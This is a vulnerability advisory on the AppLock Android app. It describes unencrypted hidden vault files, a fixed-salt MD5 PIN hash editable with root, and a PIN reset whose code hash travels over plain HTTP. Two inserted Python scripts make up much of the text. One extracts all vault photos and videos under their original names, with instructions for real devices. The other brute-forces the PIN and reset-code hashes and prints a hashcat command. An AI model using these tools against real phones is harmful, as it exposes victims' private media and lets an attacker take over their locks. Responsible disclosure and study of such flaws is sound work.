SSD Advisory – AppLock Multiple Vulnerabilities

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
AppLock is the most downloaded app lock in the Play Store:

  • #1 App lock in over 50 countries.
  • Over 100 Million users, supporting 24 languages.
  • AppLock can lock SMS, Contacts, Gmail, Facebook, Gallery, Market, Settings, Calls and any app you choose, with abundant options, protecting your privacy.
  • AppLock can hide pictures and videos, AppLock empowers you to control photo and video access. Selected pictures vanish from your photo gallery, and stay locked behind an easy-to-use PIN pad. With AppLock, only you can see your hidden pictures. Privacy made easy!


Vulnerability Details
The following report describes three (3) different vulnerabilities found in AppLock, an Android application with over 10 million downloads, used to secure pictures, videos and applications with a PIN code.
The first vulnerability shows that pictures and videos are not encrypted but merely hidden from the user; even without root permission they can be recovered, together with their original filenames.
The second vulnerability shows how a user with root permission on the device can easily remove the PIN lock from applications or add it to others, and can also change the PIN code.
The last, and most critical, vulnerability is a PIN bypass. Without root permission, and with all applications, settings, etc. locked by the app, it is possible to reset the PIN code to one of our choosing and take full control of the application.

Weak File “Encryption” Mechanism
This vulnerability allows an attacker to recover the files (photos and videos) that the target placed in the “Vault”.
The user is led to believe that the Vault encrypts the files with his PIN code; in fact, all files are simply hidden in the filesystem.
It is important to notice that all files are saved on the shared external storage (the SD card area, readable by any user or app that can access external storage) and not in the application's private data directory. This allows anyone to read those files.
To retrieve the files the attacker just needs to install a file manager and go to:
/<sdcard directory>/.dom0o7b1i1le/dont_remove/
and open the SQLite file found there (usually named with a 16-byte hash). Inside, the medias table, dest_path column, holds the PATH of each hidden image and video.
To find the real directory, replace .MySecurityData with .dom0o7b1i1le in that path.
In that directory each file is named with a timestamp; the original name can be recovered from the same SQLite database.
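The recovery steps above can be automated. The script below is an added example written for this advisory, not code from SSD or from AppLock: it locates the SQLite database by its file header (the file is named with a hash and has no extension), reads medias.dest_path, swaps .MySecurityData for .dom0o7b1i1le, and copies each timestamp-named file out under its original name. Three things are assumptions, not facts from the advisory: the column holding the original filename is called src_path, the hidden files live in a per-hash subdirectory of dont_remove, and the sample vault built by build_demo_vault() is constructed data so the script runs offline.

```python
"""Recover files from an AppLock "Vault" directory (added example).

Assumed (not stated in the advisory): the original filename column is
src_path, and hidden files sit under <sdcard>/.dom0o7b1i1le/dont_remove/<hash>/.
"""
import shutil
import sqlite3
from pathlib import Path

HIDDEN_DIR = ".dom0o7b1i1le"     # real directory name on external storage (advisory)
LOGICAL_DIR = ".MySecurityData"  # name recorded in dest_path (advisory)
SQLITE_MAGIC = b"SQLite format 3\x00"


def is_sqlite(path: Path) -> bool:
    """Identify the database by its header, since its name is just a hash."""
    try:
        with open(path, "rb") as fh:
            return fh.read(16) == SQLITE_MAGIC
    except OSError:
        return False


def find_vault_databases(sdcard) -> list:
    base = Path(sdcard).resolve() / HIDDEN_DIR / "dont_remove"
    if not base.is_dir():
        return []
    return sorted(p for p in base.iterdir() if p.is_file() and is_sqlite(p))


def hidden_path(dest_path: str) -> Path:
    """dest_path is recorded with .MySecurityData; on disk the directory is .dom0o7b1i1le."""
    return Path(dest_path.replace(LOGICAL_DIR, HIDDEN_DIR, 1))


def recover_vault(sdcard, out_dir) -> list:
    """Copy every hidden media file into out_dir under its original name.

    Returns a list of (hidden_path, recovered_path) tuples."""
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    recovered = []
    for db in find_vault_databases(sdcard):
        # open read-only so the evidence on the device is never modified
        con = sqlite3.connect(db.as_uri() + "?mode=ro", uri=True)
        try:
            # dest_path comes from the advisory; src_path is the assumed original-name column
            rows = con.execute("SELECT dest_path, src_path FROM medias").fetchall()
        finally:
            con.close()
        for dest_path, src_path in rows:
            src = hidden_path(dest_path)
            if not src.is_file():
                continue  # database row whose file is gone; nothing to recover
            name = Path(src_path).name if src_path else src.name
            target = out / name
            n = 1
            while target.exists():  # two vault entries may share an original name
                target = out / f"{Path(name).stem}_{n}{Path(name).suffix}"
                n += 1
            shutil.copy2(src, target)
            recovered.append((str(src), str(target)))
    return recovered


def build_demo_vault(sdcard) -> dict:
    """Build a constructed, fake vault layout for offline testing.

    Returns a mapping original filename -> file content."""
    sdcard = Path(sdcard).resolve()
    store = sdcard / HIDDEN_DIR / "dont_remove" / "0123456789abcdef0123456789abcdef"
    store.mkdir(parents=True)
    samples = {"IMG_0001.jpg": b"\xff\xd8\xff\xe0fake-jpeg",
               "VID_0002.mp4": b"\x00\x00\x00\x18ftypmp42fake"}
    db = sqlite3.connect(store.parent / "fedcba9876543210fedcba9876543210")
    db.execute("CREATE TABLE medias (id INTEGER PRIMARY KEY, src_path TEXT, dest_path TEXT)")
    for i, (name, data) in enumerate(samples.items()):
        stamp = str(1438000000000 + i)  # hidden files are renamed to a timestamp
        (store / stamp).write_bytes(data)
        logical = str(sdcard / LOGICAL_DIR / "dont_remove" / store.name / stamp)
        db.execute("INSERT INTO medias (src_path, dest_path) VALUES (?, ?)",
                   (f"/storage/emulated/0/DCIM/Camera/{name}", logical))
    db.commit()
    db.close()
    return samples


if __name__ == "__main__":
    import tempfile
    root = Path(tempfile.mkdtemp())
    build_demo_vault(root / "sdcard")
    for hidden, restored in recover_vault(root / "sdcard", root / "out"):
        print(f"{hidden} -> {restored}")
```

On a real device, point recover_vault() at the external storage root (for example the directory adb exposes as /sdcard) and an output directory on the analysis machine; the database is opened read-only so the original artefacts are left untouched.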

Technical Details
Steps
The following screenshots show the steps to retrieve the file:
applock_image_1
We can easily locate the SQLite database file in the hidden directory.
applock_image_2
In the file we can find the PATH of the image we want to retrieve. Remember we may need to replace “.MySecurityData” with “.dom0o7b1i1le”
applock_image_3
Inside the directory we can find our file, named with a timestamp. We can simply copy it, or rename it back to its original name, to restore access.
Weak Lock Mechanism (root required)
This vulnerability allows an attacker with local access to a target device on which root permission is enabled to perform the following operations:

  • Change which applications are locked: open the SQLite database /data/data/com.domobile.applock/databases/domobile_elock.db and remove rows from (or add rows to) the lock table, whose pname column identifies the locked application by package name.
  • Change the target's PIN code: the PIN code hash is saved in /data/data/com.domobile.applock/shared_prefs/com.domobile.applock_preferences.xml and is a plain MD5 of the PIN with a fixed salt used in ALL installations of the app. The salt is: domobile. Since most people use a short numeric PIN (4-8 digits), it is also trivial to recover the PIN by brute force.

Technical Details
Steps
applock_image_4
The hashed password can be found in the preferences file.
applock_image_5
Using 1234 as the PIN code and domobile as the salt, the computed hash matches the stored one.
applock_image_6
The list of locked applications is visible, and rows can be removed or new ones added.

Weak PIN reset Mechanism
This vulnerability allows an attacker to reset the PIN code and gain full access to all functionality of the application without any special permission. To exploit it we just need to start the password reset function; there are then two possibilities:

  • The target has not set an email address: in this case we can simply enter our own address during the reset procedure and receive the code needed to reset the PIN.
  • The target has set an email address: then we can do the following:
    • Use Wireshark to intercept the traffic from the smartphone to the internet
    • From the application, send the reset request
    • Intercept the server response (which is sent over plain HTTP)

The server response contains the MD5 hash of the reset code that was emailed, so we do not need access to the target's email to retrieve the code. The code is a simple 8-character alphanumeric string, so the MD5 hash can be cracked in at most about an hour on a low-to-mid-range GPU.
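Both MD5 hashes in this advisory (the salted PIN hash in com.domobile.applock_preferences.xml from the root-required vulnerability above, and the unsalted reset-code hash returned over HTTP here) fall to the same brute-force loop. The script below is an added example written for this advisory, not code from SSD or from AppLock. One assumption is labelled in the code: the advisory gives the salt "domobile" but not whether it is prepended or appended to the PIN, so both orders are tried. The pure-Python loop is for the small numeric PIN keyspace and for demonstrating the technique; the full 62^8 reset-code keyspace is a GPU job, and hashcat_mask_command() produces the equivalent hashcat mask attack.

```python
"""Brute-force the MD5 hashes AppLock uses for the PIN and the reset code (added example).

Assumption: the concatenation order of PIN and salt is not stated in the
advisory, so salted_forms() tries both pin+salt and salt+pin.
"""
import hashlib
import itertools
import string

SALT = "domobile"  # fixed salt, identical in every installation (advisory)
PIN_ALPHABET = string.digits
CODE_ALPHABET = string.ascii_letters + string.digits  # 8-character alphanumeric reset code


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def crack_md5(target_hex: str, alphabet: str, min_len: int, max_len: int, forms=None):
    """Return the guess for which some hashed form equals target_hex, else None.

    forms(guess) yields the byte strings actually hashed; by default the guess itself."""
    target = target_hex.strip().lower()
    if forms is None:
        forms = lambda g: (g.encode(),)
    for n in range(min_len, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            guess = "".join(chars)
            for data in forms(guess):
                if md5_hex(data) == target:
                    return guess
    return None


def salted_forms(pin: str):
    # Concatenation order is an assumption (not given in the advisory): try both.
    return (pin + SALT).encode(), (SALT + pin).encode()


def crack_pin(stored_hash: str, min_len: int = 4, max_len: int = 8):
    """Recover a numeric PIN from the salted MD5 stored in shared_prefs.

    4-8 digits is about 1.1e8 candidates (x2 for both salt orders), fine on a CPU."""
    return crack_md5(stored_hash, PIN_ALPHABET, min_len, max_len, salted_forms)


def crack_reset_code(stored_hash: str, length: int = 8):
    """Recover the emailed reset code from the unsalted MD5 in the HTTP response.

    62**8 candidates is far too many for this loop; use it for short codes only
    and hand the real hash to hashcat (see hashcat_mask_command)."""
    return crack_md5(stored_hash, CODE_ALPHABET, length, length)


def keyspace(alphabet: str, min_len: int, max_len: int) -> int:
    """Number of candidates the loop would have to hash in the worst case."""
    return sum(len(alphabet) ** n for n in range(min_len, max_len + 1))


def hashcat_mask_command(stored_hash: str, length: int = 8) -> str:
    """GPU equivalent: -m 0 is raw MD5, -a 3 a mask attack, -1 ?l?u?d a custom
    charset of lower, upper and digits, and one ?1 per character of the code."""
    mask = "?1" * length
    return f"hashcat -m 0 -a 3 -1 ?l?u?d {stored_hash} {mask}"


if __name__ == "__main__":
    # constructed sample hashes, not values taken from a real device
    demo_pin_hash = md5_hex(b"1234" + SALT.encode())
    print("PIN:", crack_pin(demo_pin_hash, max_len=4))
    demo_code_hash = md5_hex(b"aZ9")
    print("short reset code:", crack_reset_code(demo_code_hash, length=3))
    print("full keyspace:", keyspace(CODE_ALPHABET, 8, 8))
    print(hashcat_mask_command(md5_hex(b"placeholder")))
```

For the PIN, copy the hash out of the preferences file (root is needed for that, as the advisory notes) and pass it to crack_pin(); for the reset code, pass the hash captured from the HTTP response to hashcat with the mask the helper prints, since the alphanumeric keyspace is what makes the GPU necessary.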
Technical Details
Steps
For clarity I’ll use an HTTP proxy to intercept requests and responses, but the same can be done with Wireshark in monitor mode.
applock_image_7
Insert password view
applock_image_8
We can either set an email address or send the code to our own email.
applock_image_9
When the code is requested, its MD5 hash is sent back to the application over plain HTTP.
Vendor Response
The vendor was very responsive at the beginning, with a response in less than 24 hours stating that they take all vulnerabilities seriously; however, since the 31st of July no further response has been received, despite numerous attempts to establish communication with them. We have therefore decided to notify the public of this insecure product as soon as possible: it is being used by a lot of people to protect their phones, and they are therefore getting a false sense of security.
